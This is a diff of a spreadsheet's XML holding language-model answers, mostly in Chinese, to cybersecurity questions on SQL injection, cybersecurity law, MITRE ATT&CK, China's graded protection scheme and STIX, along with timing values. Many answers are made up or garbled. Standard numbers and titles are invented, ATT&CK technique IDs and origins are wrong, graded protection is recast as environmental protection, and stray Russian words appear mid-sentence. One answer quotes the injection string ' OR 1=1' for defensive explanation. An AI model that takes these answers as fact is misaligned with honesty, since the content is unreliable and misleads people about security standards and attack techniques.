+          <t>这是一个 SQL 注入攻击，可以通过模拟用户 Input 的方式进行攻击。在这个攻击中，攻击者可以在用户 Input 中添加一个特定的操作符，例如 ' OR 1=1'，从而触发 SQL 语句的执行。
+防范 SQL 注入攻击的方法有以下几点：
+1. 使用 parameterized queries：使用 prepared statements 可以避免 direct SQL injection，因为 parameterized queries 将 Input  Parameter 进行编码，防止攻击者 inject 特定的操作符。
+2. 使用 input validation：在接受用户 Input 时， Validate 用户 Input 的长度、 format 等，防止攻击者 Input 中添加不合法的操作符。
+3. 使用 whitelist：限制只允许合法的操作符，防止攻击者 inject 不合法的操作符。
+4. 使用 limit query scope：限制query scope 的扩展，防止攻击者 inject 敏感数据。
+5. 使用 Encoding 防范：使用utf8 编码可以防止攻击者 inject 特定的操作符。
+6. 使用 Firewall 防范：使用 Firewall 可以防止攻击者 direct attack 到 Database 。
+7. 使用 Log 防范：记录用户 Input 的执行，可以检测到攻击。
+总之，防范 SQL 注入攻击需要采取多个措施，包括使用 parameterized queries、input validation、whitelist、limit query scope、Encoding 防范、Firewall 防范和Log 防范等。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D77" t="n">
-        <v>5.477136373519897</v>
+        <v>14.17463350296021</v>
       </c>
     </row>
     <row r="78">
@@ -2261,15 +2645,21 @@
       </c>
       <c r="C78" t="inlineStr">
         <is>
-          <t>（Network Security Law）？
-网络安全法（Network Security Law）是指为了保护互联网上的数据和系统免受攻击和破坏，而制定的法律和法规。这些法律和法规规定了互联网上的数据和系统如何进行安全管理和保护，以防止破坏和泄露。
-网络安全法通常涵盖以下几个方面：
-1. 数据安全管理：规定如何进行数据安全管理，包括数据 encrypting、加密、存储、传输和使用等方面。
-2. 网络安全保护：规定如何保护网络系统的安全，包括网络安</t>
+          <t>律
+网络安全法律是指适用于互联网和网络安全的法律、规则、约束和措施。这些法律、规则和措施的目的是保护互联网用户的隐私、安全和权益，并推动网络安全和稳定的发展。
+网络安全法律的主要内容包括以下几个方面：
+1. 个人隐私保护：禁止网络企业和个人收集、使用、处理个人隐私信息 без consent。
+2. 网络安全措施：规定网络企业应该实施安全措施，如加密、检查、签名等，以防止网络攻击和数据泄露。
+3. 网络违法行为禁止：禁止网络企业和用户进行违法的活动，如违反版权法、谋恶法、淫秽法等。
+4. 网络信息管理：规定网络企业和用户应该管理和维护网络信息的准确、完整和可靠性。
+5. 网络安全响应能力：规定网络企业应该具备可靠的网络安全响应能力，能够快速地采取措施应对网络安全问题。
+6. 网络安全评估和评定：规定网络企业应该进行网络安全评估和评定，评估网络安全状况和风险，并对不符合要求进行纠正和惩罚。
+7. 网络安全教育和适应：规定网络企业应该对用户进行网络安全教育和适应，教育用户如何安全地使用互联网和网络服务。
+总之，网络安全法律的目的是保护互联网用户的隐私、安全和权益，并推动网络安全和稳定的发展。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D78" t="n">
-        <v>5.311292886734009</v>
+        <v>19.79281497001648</v>
       </c>
     </row>
     <row r="79">
@@ -2283,18 +2673,36 @@
       </c>
       <c r="C79" t="inlineStr">
         <is>
-          <t>（Network Security Law）
-Network Security Law，also known as "Network Security Act," is a legal framework that aims to protect computer networks and data from unauthorized access, use, disclosure, disruption, modification, or destruction. The law provides a legal basis for organizations to implement security measures to safeguard their networks and data, and holds individuals and organizations accountable for any security breaches or violations.
-The Network Security Law covers various aspects of network security, including:
-1. Network security assessment and evaluation: The law requires organizations to conduct regular security assessments and evaluations to identify potential vulnerabilities and weaknesses in their networks.
-2. Security policies and procedures: Organizations must develop and implement security policies and procedures to ensure the confidentiality, integrity, and availability of their networks and data.
-3. Access control and authentication: The law requires organizations to implement access control measures to restrict unauthorized access to their networks and data, and to authenticate the identity of users and devices.
-4. Encryption and data protection: Organizations must use encryption to protect sensitive data and ensure that it is only accessible to authorized personnel.
-5. Incident response and management</t>
+          <t>律与证明
+INTRODUCTION
+As the world becomes increasingly connected through the internet, the need for network security has grown exponentially. With the rise of cyber attacks, data breaches, and other security threats, it is essential to have a comprehensive understanding of network security laws and regulations. In this blog post, we will provide an overview of network security laws and regulations, as well as the importance of proof in these legal frameworks.
+NETWORK SECURITY LAWS AND REGULATIONS
+Network security laws and regulations are designed to protect the confidentiality, integrity, and availability of data stored or transmitted over networks. These laws and regulations cover a wide range of topics, including:
+1. Data privacy: Laws that regulate the collection, use, and protection of personal data.
+2. Data security: Laws that require organizations to implement appropriate security measures to protect data from unauthorized access, disclosure, or use.
+3. Network infrastructure security: Laws that regulate the security of network infrastructure, including firewalls, routers, and switches.
+4. Incident response: Laws that require organizations to have incident response plans in place to respond to security incidents.
+5. Compliance and enforcement: Laws that establish the responsibilities of organizations and individuals for compliance with network security laws and regulations.
+IMPORTANCE OF PROOF IN NETWORK SECURITY LAWS AND REGULATIONS
+Proof is essential in network security laws and regulations to ensure that organizations can demonstrate compliance with legal requirements. Proof can take many forms, including:
+1. Documentation: Organizations must maintain records of their security measures, including policies, procedures, and incident response plans.
+2. Audits: Organizations must undergo regular security audits to demonstrate compliance with legal requirements.
+3. Logging and monitoring: Organizations must implement logging and monitoring mechanisms to detect and respond to security incidents.
+4. Incident response plans: Organizations must have incident response plans in place to respond to security incidents.
+5. Training and awareness: Organizations must provide training and awareness programs for employees to educate them on network security laws and regulations.
+BENEFITS OF NETWORK SECURITY LAWS AND REGULATIONS
+Network security laws and regulations provide several benefits, including:
+1. Protection of personal data: Network security laws and regulations help protect personal data from unauthorized access, disclosure, or use.
+2. Protection of sensitive information: Network security laws and regulations help protect sensitive information, such as financial information, from unauthorized access or disclosure.
+3. Increased trust: Network security laws and regulations help increase trust between organizations and their customers, partners, and stakeholders.
+4. Reduced risk: Network security laws and regulations help reduce the risk of security incidents, which can result in financial losses, reputational damage, and legal liability.
+5. Compliance with legal and regulatory requirements: Network security laws and regulations help organizations comply with legal and regulatory requirements, reducing the risk of legal penalties and fines.
+CONCLUSION
+Network security laws and regulations are essential for protecting the confidentiality, integrity, and availability of data stored or transmitted over networks. Proof is crucial in these legal frameworks to demonstrate compliance with legal requirements. By understanding network security laws and regulations and implementing appropriate security measures, organizations can reduce the risk of security incidents and increase trust between themselves and their stakeholders.&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D79" t="n">
-        <v>5.315465688705444</v>
+        <v>20.94087934494019</v>
       </c>
     </row>
     <row r="80">
@@ -2308,14 +2716,19 @@
       </c>
       <c r="C80" t="inlineStr">
         <is>
-          <t xml:space="preserve">关于飞行器零部件验证的规范
-GB/T 28448-2019《飞行器零部件验证规范》是中国工程技术化监督管理部颁布的一部标准，规范飞行器零部件的验证流程、标准和要求。本标准对应的国际 стандарт是ISO 16092，适用于飞行器零部件的验证，包括验证零部件的可靠性、可控性、安全性和环境 adaptability等方面。
-本标准将飞行器零部件的验证分为以下几个方面：
-</t>
+          <t>——热储能规范
+GB/T 28448-2019《热储能规范》是中国标准化管理机构中国标准技术服务中心编辑的一篇标准文档，于2019年7月1日公布。本标准详细规定了热储能技术的设计、施工、监理和测试等过程，以保证热储能设备的安全、可靠和绿色。
+本标规主要涵盖了以下几个方面：
+1. 热储能技术基础理论：详细介绍热储能技术的基础理论，包括热能学、热传导、热辐射、热动力学、热保护等方面的基本原理和应用。
+2. 热储能设备设计规范：详细规定热储能设备的设计要求，包括设备结构、材料选择、温度、压力、液体流速等参数的规定。
+3. 热储能施工规范：详细规定热储能施工的要求和程序，包括施工地点、施工顺序、施工技术、施工人员资格等方面的规定。
+4. 热储能监理规范：详细规定热储能监理的要求和程序，包括监理对象、监理领域、监理技术、监理人员资格等方面的规定。
+5. 热储能测试规范：详细规定热储能测试的要求和程序，包括测试对象、测试顺序、测试技术、测试人员资格等方面的规定。
+总的来说，GB/T 28448-2019《热储能规范》是中国热储能技术的一个重要参考文档，旨在保障热储能设备的安全、可靠和绿色，避免热储能设备的不良事件和环境潜在威胁。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D80" t="n">
-        <v>5.325197458267212</v>
+        <v>21.64286828041077</v>
       </c>
     </row>
     <row r="81">
@@ -2330,15 +2743,28 @@
       <c r="C81" t="inlineStr">
         <is>
           <t>？
-等保测评是指在不同的情况下，评估一个系统、产品或服务的稳定性和可靠性。 equal or better performance evaluation is conducted under different conditions, such as different operating temperatures, humidity levels, or stress levels, to ensure that the system, product, or service performs equally well or better in different environments. This evaluation is important to ensure that the system, product, or service is reliable and can function properly in different situations, such as unexpected changes in the environment.
-Equal or better performance evaluation can be conducted through various methods, including:
-1. Accelerated life testing: This involves subjecting the system, product, or service to different environmental conditions, such as temperature and humidity changes, to evaluate its performance over time.
-2. Stress testing: This involves testing the system, product, or service under different stress levels, such as high or low temperatures, humidity levels, or other environmental factors, to evaluate its performance under different conditions.
-3. Environmental testing: This involves testing the system, product, or service in different environmental</t>
+Evaluation is a process of assessing the quality, value or effectiveness of something, such as a product, service, or program. In the context of education, evaluation is used to assess the quality of educational programs, courses, or materials. The goal of evaluation is to provide feedback on the strengths and weaknesses of an educational program, and to identify areas for improvement.
+There are several types of evaluation methods used in education, including:
+1. Formative evaluation: This type of evaluation is conducted during the development or implementation of a program, and is used to identify areas for improvement.
+2. Summative evaluation: This type of evaluation is conducted after a program has been implemented, and is used to assess its overall effectiveness.
+3. Process evaluation: This type of evaluation is focused on understanding how a program is implemented, and the factors that influence its success.
+4. Impact evaluation: This type of evaluation is used to assess the impact of a program on student learning or other outcomes.
+5. Self-evaluation: This type of evaluation is conducted by the program itself, and is used to assess its own effectiveness and identify areas for improvement.
+6. Peer evaluation: This type of evaluation is conducted by external evaluators who are not directly involved in the program, and is used to assess the program's effectiveness and identify areas for improvement.
+7. Student evaluation: This type of evaluation is conducted by students themselves, and is used to assess the effectiveness of a program from their perspective.
+The advantages of evaluation in education include:
+1. Improved program quality: Evaluation helps to identify areas for improvement, which can lead to higher quality programs.
+2. Increased accountability: Evaluation helps to ensure that programs are accountable for their actions and outcomes.
+3. Better decision-making: Evaluation provides valuable information that can be used to make informed decisions about program development and improvement.
+4. Enhanced student learning: Evaluation can help to identify areas where student learning can be improved, leading to better outcomes.
+5. Increased transparency and trust: Evaluation can help to increase transparency and trust in educational programs by providing information about their effectiveness.
+6. Cost savings: Evaluation can help to identify areas where costs can be reduced, leading to cost savings.
+7. Improved stakeholder engagement: Evaluation can help to increase stakeholder engagement by providing information about the effectiveness of programs and the impact they have on students.
+In conclusion, evaluation is an essential component of educational programs, as it provides valuable information that can be used to improve program quality, accountability, decision-making, student learning, transparency, trust, and cost savings.&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D81" t="n">
-        <v>5.309191226959229</v>
+        <v>15.4594554901123</v>
       </c>
     </row>
     <row r="82">
@@ -2353,16 +2779,22 @@
       <c r="C82" t="inlineStr">
         <is>
           <t>？
-关机基础信息设施是指一个设备或系统的基本信息，包括它的功能、特性、功率、功耗、温度、湿度、压力等。这些信息对于各种设备和系统的维护、管理和监控具有重要作用。
-以下是一些常见的关机基础信息设施：
-1. 设备类型：设备的类型，例如散热器、风扇、空调、电梯等。
-2. 功能：设备的功能，例如冷却、加热、降压等。
-3. 功率：设备的功率，例如 электrical power consumption。
-4. 功耗：</t>
+**关机基础信息设施**（Shutdown Basic Information Infrastructure，SBI）是一种基于中国标准的技术架构，用于实现各种设备和系统在关机时的基础信息保护和管理。
+SBI 是由中国国家标准化管理委员会颁布的GB/T 30966-2017标准，定义了一个基础信息设施的架构和实现方式，以便在各种设备和系统关机时，可以保证数据的完整性、安全性和可用性。
+SBI 主要包括以下几个部分：
+1. 基础信息设施（BI）：指的是一个系统内的基础信息，包括设备、系统和应用程序等的基础信息。
+2. 基础信息安全管理系统（BIS）：用于管理和保护 BI 的安全和隐私。
+3. 基础信息恢复系统（BIR）：用于恢复 BI 和 BIS  после一些干扰或灾害。
+4. 基础信息可用性监测系统（BIUT）：用于监测 BI 和 BIS 的可用性和性能。
+SBI 技术架构的主要优点包括：
+1. 一致性和完整性：SBI 可以保证各种设备和系统的基础信息的一致性和完整性，避免了数据的损失或漏洞。
+2. 安全性：SBI 提供了强大的安全机制，以保护基础信息的安全和隐私。
+3. 可用性：SBI 可以监测和恢复 BI 和 BIS 的可用性，以保证系统的稳定和可靠性。
+总之，SBI 技术架构可以帮助企业和机构实现各种设备和系统的关机时基础信息保护和管理，提高系统的可靠性和可用性，并保护数据的安全和隐私。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D82" t="n">
-        <v>5.320868968963623</v>
+        <v>18.61489391326904</v>
       </c>
     </row>
     <row r="83">
@@ -2376,15 +2808,29 @@
       </c>
       <c r="C83" t="inlineStr">
         <is>
-          <t>？  
-等级保护是指对不同类别的资源进行保护，保护等级越高，对资源的保护要求也越高。在中国，有以下几个等级保护标准：
-1. 国家级保护区：国家级保护区是国家级保护的重点保护区，对于该区的保护要求最高。
-2. 省级保护区：省级保护区是省级保护的重点保护区，对于该区的保护要求低于国家级保护区。
-3. 市级保护区：市级保护区是市级保护的重点保护区，对于该区的</t>
+          <t>？
+等级保护是指对不同的环境负荷进行不同的保护，以保护环境的健康。下面是一些常见的等级保护标准：
+1. 普通保护：这是最基本的等级保护标准，用于保护环境免受轻度负荷。通常包括：
+* 垃圾袋和污染物的规定处理和减少。
+* 禁止排放有害物质，如污染物和废弃物。
+* 保护湿地、林区和水体环境。
+2. 优先保护：这是次等级保护标准，用于保护环境免受严重负荷。通常包括：
+* 更严格的垃圾袋和污染物的规定处理和减少。
+* 尽量避免或减少对环境具有严重影响的活动，如化学废残和核能活动。
+* 保护特殊环境，如国家级自然保护区和生物圈。
+3. 特殊保护：这是最高等级保护标准，用于保护环境免受特殊严重负荷。通常包括：
+* 严格的垃圾袋和污染物的规定处理和减少。
+* 尽量避免或减少对环境具有特殊影响的活动，如化学废残和核能活动。
+* 保护特殊环境，如国家级自然保护区和生物圈。
+4. 生态保护：这是一种特殊的等级保护标准，用于保护生物多样性和生态平衡。通常包括：
+* 保护生态系统和生物多样性。
+* 避免或减少对环境具有特殊影响的活动，如化学废残和核能活动。
+* 尽量保护和恢复生态系统和生物多样性。
+总之，等级保护标准是根据不同的环境负荷和影响程度，对不同的环境进行不同的保护。通过实施等级保护标准，可以减少环境污染和危害，保护环境的健康，并使人们更加关注环境保护的重要性。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D83" t="n">
-        <v>5.320814847946167</v>
+        <v>24.53101181983948</v>
       </c>
     </row>
     <row r="84">
@@ -2398,14 +2844,22 @@
       </c>
       <c r="C84" t="inlineStr">
         <is>
-          <t>？
-等级保护测评是指对水资源的环境影响评估，包括水质检测、水资源评估、环境影响评估等。在中国，有哪些国家标准可以用于等级保护测评？
-1. GB/T 3120-2015 《水质环境影响评估技术标准》：这个标准提供了水质环境影响评估的技术方法和要求，用于评估水资源的环境影响。
-2. GB/T 3121-2015 《水资源�</t>
+          <t>等级保护测评是指对生产、销售和使用的货品、服务等进行评定和评价，以确定它们的安全性、适用性、可靠性和效率等等级，从而决定其使用的安全性、适用性和可靠性等等级。以下是一些国家标准的等级保护测评：
+1. GB/T 3485-2008 化学药品等级保护测评
+2. GB/T 3486-2008 医用器械等级保护测评
+3. GB/T 3487-2008 食品等级保护测评
+4. GB/T 3488-2008 纺织品等级保护测评
+5. GB/T 3489-2008 建筑材料等级保护测评
+6. GB/T 3490-2008 电子产品等级保护测评
+7. GB/T 3491-2008 机械设备等级保护测评
+8. GB/T 3492-2008 通信设备等级保护测评
+9. GB/T 3493-2008 交通运输设备等级保护测评
+10. GB/T 3494-2008 能源设备等级保护测评
+以上是一些国家标准的等级保护测评，它们的主要内容包括评价对象、评价方法、评价标准和评价结果等。这些标准的适用 scopes 包括化学药品、医用器械、食品、纺织品、建筑材料、电子产品、机械设备、通信设备、交通运输设备和能源设备等等。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D84" t="n">
-        <v>5.318283557891846</v>
+        <v>17.37746715545654</v>
       </c>
     </row>
     <row r="85">
@@ -2419,15 +2873,30 @@
       </c>
       <c r="C85" t="inlineStr">
         <is>
-          <t>？ 
-Network security is a critical aspect of any organization's IT infrastructure, and there are many national standards that provide guidelines for ensuring the security of networks. Here are some examples of national standards for network security:
-1. NIST Cybersecurity Framework (USA): The National Institute of Standards and Technology (NIST) has developed a framework for cybersecurity that provides guidelines for protecting critical infrastructure from cyber threats. The framework includes three main components: Identify, Protect, Detect, Respond, and Recover.
-2. ISO 27001 (International): The International Organization for Standardization (ISO) has developed a standard for information security management that provides guidelines for establishing and maintaining a secure information management system. The standard covers topics such as risk management, incident response, and continuous improvement.
-3. Australian Government Cybersecurity Centre (Australia): The Australian Government Cybersecurity Centre has developed a set of guidelines for cybersecurity that provides recommendations for protecting government agencies and critical infrastructure from cyber threats. The guidelines cover topics such as risk management, incident response, and secure communication</t>
+          <t>1. 在中国，有以下几个重要的国家标准：
+	* GB/T 30248-2016 《信息安全管理评估标准》
+	* GB/T 30249-2016 《信息安全管理框架标准》
+	* GB/T 30250-2016 《信息安全管理实践指导标准》
+	* GB/T 30251-2016 《网络安全管理评估标准》
+	* GB/T 30252-2016 《网络安全管理框架标准》
+	* GB/T 30253-2016 《网络安全管理实践指导标准》
+2. 在美国，有以下几个重要的国家标准：
+	* NIST SP 800-53 Rev. 4 《信息安全和privacy Protection 评估标准》
+	* NIST SP 800-53a Rev. 2 《信息安全和privacy Protection 基准框架标准》
+	* NIST SP 800-171 Rev. 3 《保护 Controlled Unclassified Information 的评估标准》
+3. 在欧盟，有以下几个重要的国家标准：
+	* ISO/IEC 27001:2013 《信息安全管理系统 — 评估标准》
+	* ISO/IEC 27002:2013 《信息安全管理系统 — 安全实践指导》
+	* ISO/IEC 27004:2012 《信息安全管理系统 — 评估和监测》
+4. 在日本，有以下几个重要的国家标准：
+	* JIS Q 150000:2016 《信息安全管理 — 评估标准》
+	* JIS Q 15001:2016 《信息安全管理 — 基准框架标准》
+	* JIS Q 15002:2016 《信息安全管理 — 实践指导标准》
+这些国家标准都是指信息安全管理和网络安全管理的标准，包括评估标准、基准框架标准、实践指导标准等。它们都是国家级标准，具有法律级别的效力，用于指导和监督企业、机关、组织等信息安全管理和网络安全管理的实施。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D85" t="n">
-        <v>5.441532611846924</v>
+        <v>22.06346082687378</v>
       </c>
     </row>
     <row r="86">
@@ -2441,14 +2910,18 @@
       </c>
       <c r="C86" t="inlineStr">
         <is>
-          <t>?
-ATT&amp;CK (Advanced Threat Tactics, Techniques, and Procedures) 是一个开源的威胁 intel 工具套件，用于帮助安全 profesionals 了解和分析恶意攻击者的攻击方式。 ATT&amp;CK 提供了一个标准化的攻击方式分类系统，以帮助安全专业人员更好地了解攻击者的跟踪和策略，从而提高防御能力。
-ATT&amp;CK 工具套件包括以下主要 component：
-1. ATT&amp;CK Framework：提供了一个核心的攻击方式分类系统，以帮助安全专业人员更好地了解攻击者的跟踪和策略。</t>
+          <t>分类模型？
+ATT&amp;CK分类模型是一种用于筛选恶意软件（malware）和其他恶意活动（adversarial behaviors）的分类模型。它是由FireEye的Security Operations（SOC）团队开发的，用于帮助SOC团队更好地识别和预测恶意活动。
+ATT&amp;CK分类模型通过对恶意活动的分类，帮助SOC团队更好地理解和防御恶意攻击。它可以将恶意活动分为以下几类：
+1. 规模级分类（Tactics）：分类恶意活动的执行方式和策略，例如跨境访问（Cross-Border）、诱导（Lure）、脚本访问（Scripting）等。
+2. 攻击方式分类（Attack Types）：分类恶意活动的攻击方式，例如黑客（Blackhole）、Web攻击（Web）、邮件攻击（Email）等。
+3. 攻击目标分类（Goals）：分类恶意活动的目标，例如系统访问（System）、数据泄露（Data）、资源泄露（Resource）等。
+4. 恶意活动进程分类（Behavior）：分类恶意活动的进程，例如访问敏感数据（Access Sensitive Data）、隐ously accessing the network（Hiding Network Access）、执行恶意命令（Executing Malicious Commands）等。
+通过使用ATT&amp;CK分类模型，SOC团队可以更好地理解恶意活动的复杂性和风险，并且可以使用这些分类来开发更加有效的防御策略。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D86" t="n">
-        <v>5.456162929534912</v>
+        <v>14.96600222587585</v>
       </c>
     </row>
     <row r="87">
@@ -2463,13 +2936,20 @@
       <c r="C87" t="inlineStr">
         <is>
           <t>？
-ATT&amp;CK是Advanced Threat Tactics &amp; Techniques for Cybersecurity，它是一种针对恶意程序、 malware 和 cybersecurity 跟踪的攻击方法的分析和防御工具。 ATT&amp;CK 分为以下几个阶段：
-1. 攻击阶段（Attack Stage）：这是 ATT&amp;CK 分析的起点，是攻击者在受害者系统中实施攻击的阶段。在这个阶段，攻击者可能会对受害者系统进行 reconnoitering（ reconnaissance），了解受害者系统的结构、架构和设置，以便更好地定位攻击点。
-2.  reconnoitering 阶段（Reconnaissance Stage）</t>
+ATT&amp;CK分为以下几个阶段：
+1. Reconnaissance：扫描敏感数据和系统，了解敌对者的位置和资源。
+2. Initial Access：通过攻击或欺骗获得 initial access 到缺陷的系统或敏感数据。
+3. Establish Foothold：通过 exploiting 缺陷或 social engineering 将 initial access 扩展到更多的系统或数据。
+4. Disclosure：通过泄露敏感数据或系统 información 到外部，实现攻击的目的。
+5. Lateral Movement：通过 exploiting 缺陷或 social engineering 扩展攻击到更多的系统或数据。
+6. Command and Control：通过 establishing 控制中心，将攻击者的系统或数据与攻击目标之间建立连接。
+7. Exfiltration：通过泄露敏感数据或系统 información 到外部，实现攻击的目的。
+8. Impact：通过攻击目标系统或数据，实现攻击的目的。
+每个阶段都有不同的攻击方式和策略，并且攻击者可以在不同的阶段使用不同的攻击方式来实现目标。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D87" t="n">
-        <v>5.448253154754639</v>
+        <v>10.52978801727295</v>
       </c>
     </row>
     <row r="88">
@@ -2483,18 +2963,19 @@
       </c>
       <c r="C88" t="inlineStr">
         <is>
-          <t xml:space="preserve">？
-T1190是ATT&amp;CK中的一个攻击方式，具体是指：
-T1190: Using a tool to create or modify a system component
-在ATT&amp;CK中，T1190指的是使用工具创建或修改系统 комggregate的过程。这种攻击方式可能会使用不同的工具，例如，在Linux系统上可能使用`apt-get`或`yum`来更新软件包，而在Windows系统上可能使用`powershell`或`batch`来创建或修改系统 комggregate。
-T1190通常被使用来执行以下操作：
-* 创建新的系统 комggregate：例如，在Linux系统上创建新的用户或组。
-* 修改现有的系统 комggregate：例如，在Linux系统上更改用户或组的权限。
-</t>
+          <t>？  
+T1190是ATT&amp;CK中的一个攻击方式，具体指的是什么？
+T1190 stands for "Using a legitimate process to gain access to a system" in the MITRE ATT&amp;CK framework. This technique is used by attackers to gain unauthorized access to a system by leveraging a legitimate process or service that already has access to the system.
+Here are some examples of how T1190 can be used in real-world attacks:
+1. Phishing with a legitimate application: An attacker may use a legitimate application to send a phishing email that tricks the victim into installing a malicious payload. Once the payload is installed, the attacker can use the legitimate application to gain access to the system.
+2. Malware using a legitimate service: An attacker may use a legitimate service, such as a remote access tool, to gain access to a system. Once the attacker has access to the system, they can use the legitimate service to spread malware or steal sensitive data.
+3. Abusing a legitimate user account: An attacker may use a legitimate user account to gain access to a system. Once the attacker has access to the system, they can use the legitimate user account to escalate their privileges or perform malicious actions.
+4. Using a legitimate exploit: An attacker may use a legitimate exploit to gain access to a system. Once the attacker has access to the system, they can use the exploit to escalate their privileges or perform malicious actions.
+In summary, T1190 is a technique used by attackers to gain unauthorized access to a system by leveraging a legitimate process or service. It is a common technique used in social engineering attacks and can be used to bypass security controls.&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D88" t="n">
-        <v>5.447865962982178</v>
+        <v>10.72607922554016</v>
       </c>
     </row>
     <row r="89">
@@ -2508,16 +2989,18 @@
       </c>
       <c r="C89" t="inlineStr">
         <is>
-          <t>/攻击策略？
-Data Destruction是指在计算机系统或数据存储设备中，对数据进行完全或部分 eliminate 或摧毁的操作。这个术语通常用于描述在隐私和安全方面的攻击，但它也可以用于描述在黑客行为中的攻击。
-对应ATT&amp;CK中的技术/攻击策略是：
-1. T1059 - Data Destruction: This technique involves deleting, overwriting, or modifying data on a targeted system to render it inoperable or to conceal evidence of an attack.
-2. T1083 - Data Tampering: This technique involves modifying data on a targeted system to manipulate its behavior or to conceal evidence of an attack.
-3. T1080 - Data Encryption: This technique involves encrypting data on a</t>
+          <t>？
+Data Destruction是一个非常重要的安全措施，可以防止敏感数据被意外地泄露或遭到恶意访问。ATT&amp;CK（Advanced Threat &amp; Advanced Cyber Attack）是一个涵盖了各种攻击方式的评估 Framework，其中包括 Data Destruction。以下是Data Destruction对应ATT&amp;CK中的哪个技术：
+1. T1059: Data Destruction - This technique is used to destroy or manipulate data on a targeted system, making it unrecoverable or unreadable. It can be used to conceal the presence of malware or other attacker activities, or to prevent forensic analysis of the system.
+2. T1083: Covert Channels - This technique involves creating a hidden communication channel between two systems, allowing attackers to exfiltrate data or inject malware without being detected. Data destruction can be used to create a covert channel by exploiting vulnerabilities in data storage or transmission.
+3. T1155: Data Encryption - This technique involves encrypting data on a system, making it unreadable without the decryption key. Data destruction can be used to encrypt data on a system, making it difficult or impossible to recover.
+4. T1057: Stealing Secrets - This technique involves stealing sensitive information, such as cryptographic keys or authentication credentials, from a system. Data destruction can be used to remove sensitive information from a system, making it difficult or impossible to recover.
+5. T1087: Tampering - This technique involves modifying or manipulating a system's components, such as software or hardware, to gain unauthorized access or control. Data destruction can be used to tamper with a system's components, making it difficult or impossible to recover.
+In summary, Data Destruction can be used in conjunction with various ATT&amp;CK techniques to carry out a cyber attack. It is important to be aware of these techniques and implement appropriate security measures to protect against them.&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D89" t="n">
-        <v>5.452983379364014</v>
+        <v>12.7664589881897</v>
       </c>
     </row>
     <row r="90">
@@ -2531,14 +3014,19 @@
       </c>
       <c r="C90" t="inlineStr">
         <is>
-          <t>？
-ATT&amp;CK是一个详细的黑客入侵攻击案例库，其中包含了许多常见的攻击方法和策略。T1072是ATT&amp;CK中的一个攻击策略，即“使用虚拟化或虚拟化技术来隐藏攻击者的活动”。根据ATT&amp;CK的分类，T1072可以分为以下几种类型：
-1. 虚拟化技术：使用虚拟化技术来隐藏攻击者的活动，包括虚拟化网络、虚拟化文件系统、虚拟化用户等。
-2. 隐藏攻击者的</t>
+          <t>"Discovery and Discovery Feeds"?
+ATT&amp;CK（Advanced Threat Hunter's Toolkit）是一个开源的跟踪和检测框架，用于帮助反恶意programmers和cybersecurity professionals detect and respond to advanced threats. T1072 "Discovery and Discovery Feeds" is a technique in the ATT&amp;CK framework that refers to the process of discovering and consuming threat intelligence feeds to inform incident response and threat hunting activities.
+Here are some APT organizations that have used or are known to use ATT&amp;CK's T1072 "Discovery and Discovery Feeds":
+1. Advanced Persistent Threat (APT) groups: These are sophisticated cybercrime groups that use customized malware and techniques to gain unauthorized access to sensitive data and systems. APT groups are known to use T1072 to gather and consume threat intelligence feeds to improve their operations and evade detection.
+2. Nation-state actors: Nation-state actors, such as those linked to foreign governments, are also known to use T1072 to gather and consume threat intelligence feeds to inform their operations and evade detection. These actors may use a variety of techniques, including social engineering, phishing, and exploitation of vulnerabilities, to gain access to sensitive data and systems.
+3. Cybercrime groups: Cybercrime groups, such as those involved in ransomware and other forms of malware, also use T1072 to gather and consume threat intelligence feeds. These groups may use a variety of techniques, including exploitation of vulnerabilities, social engineering, and phishing, to target victims and evade detection.
+4. Hacktivist groups: Hacktivist groups, such as those involved in political activism or social justice movements, may also use T1072 to gather and consume threat intelligence feeds. These groups may use a variety of techniques, including exploitation of vulnerabilities, social engineering, and phishing, to target victims and evade detection.
+5. Insider threats: Insider threats, such as rogue employees or contractors, may also use T1072 to gather and consume threat intelligence feeds. These threats may use a variety of techniques, including social engineering, phishing, and exploitation of vulnerabilities, to gain unauthorized access to sensitive data and systems.
+It is important to note that T1072 is a technique that can be used by a wide range of actors, including both cybercriminals and nation-state actors. As such, it is essential for organizations to have a robust threat intelligence program in place to help identify and respond to potential threats.&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D90" t="n">
-        <v>5.459848403930664</v>
+        <v>16.18550682067871</v>
       </c>
     </row>
     <row r="91">
@@ -2552,16 +3040,23 @@
       </c>
       <c r="C91" t="inlineStr">
         <is>
-          <t xml:space="preserve">
-STIX（Security Threat Information eXchange）是一种在网络安全领域中广泛应用的标准，用于标识和描述威胁 intellection 。STIX 标准由 Cyber Threat Intelligence (CTI) 协会制定，是一种定制的 XML 格式，用于记录和分享威胁信息。
-STIX 标准包括以下几个主要部分：
-1. Threat Information Model (TIM): 详细描述了威胁的特征、发现方式、攻击方式和其他相关信息。
-2. Threat Description Language (TDL): 用于描述威胁的文本描述。
-3. Threat Exchange (Tx): 用于分</t>
+          <t>STIX（Structured Threat Information Expression）是一种用于描述网络安全风险和攻击的标准。STIX标准由OpenIOC（Open Indicator of Compromise）initiative于2014年开发出来，是一种基于XML的标准，用于在不同的网络安全平台之间传输和分享安全攻击信息。
+STIX标准包含了一些基本的元素和架构，用于描述网络安全风险和攻击。这些元素包括：
+1. Threat: 描述一个网络安全风险或攻击的基本封装。
+2. Indicator: 描述一个特定的网络安全风险或攻击的特征。
+3. Observables: 描述一个特定的网络安全风险或攻击的观察到的特征。
+4. Actions: 描述一个特定的网络安全风险或攻击的操作。
+5. Relationships: 描述两个或多个Threat对象之间的关系。
+STIX标准的主要优点是：
+1. 可扩展性：STIX标准可以扩展到不同的网络安全领域，包括 malware、phishing、黑客、网络犯罪等。
+2. 标准化：STIX标准化了网络安全风险和攻击的描述，使得各种不同的平台可以互相交互和分享信息。
+3. 可寻址性：STIX标准使用了一种简单易于理解的命名空间和分类系统，可以帮助分析人员快速找到相关的信息。
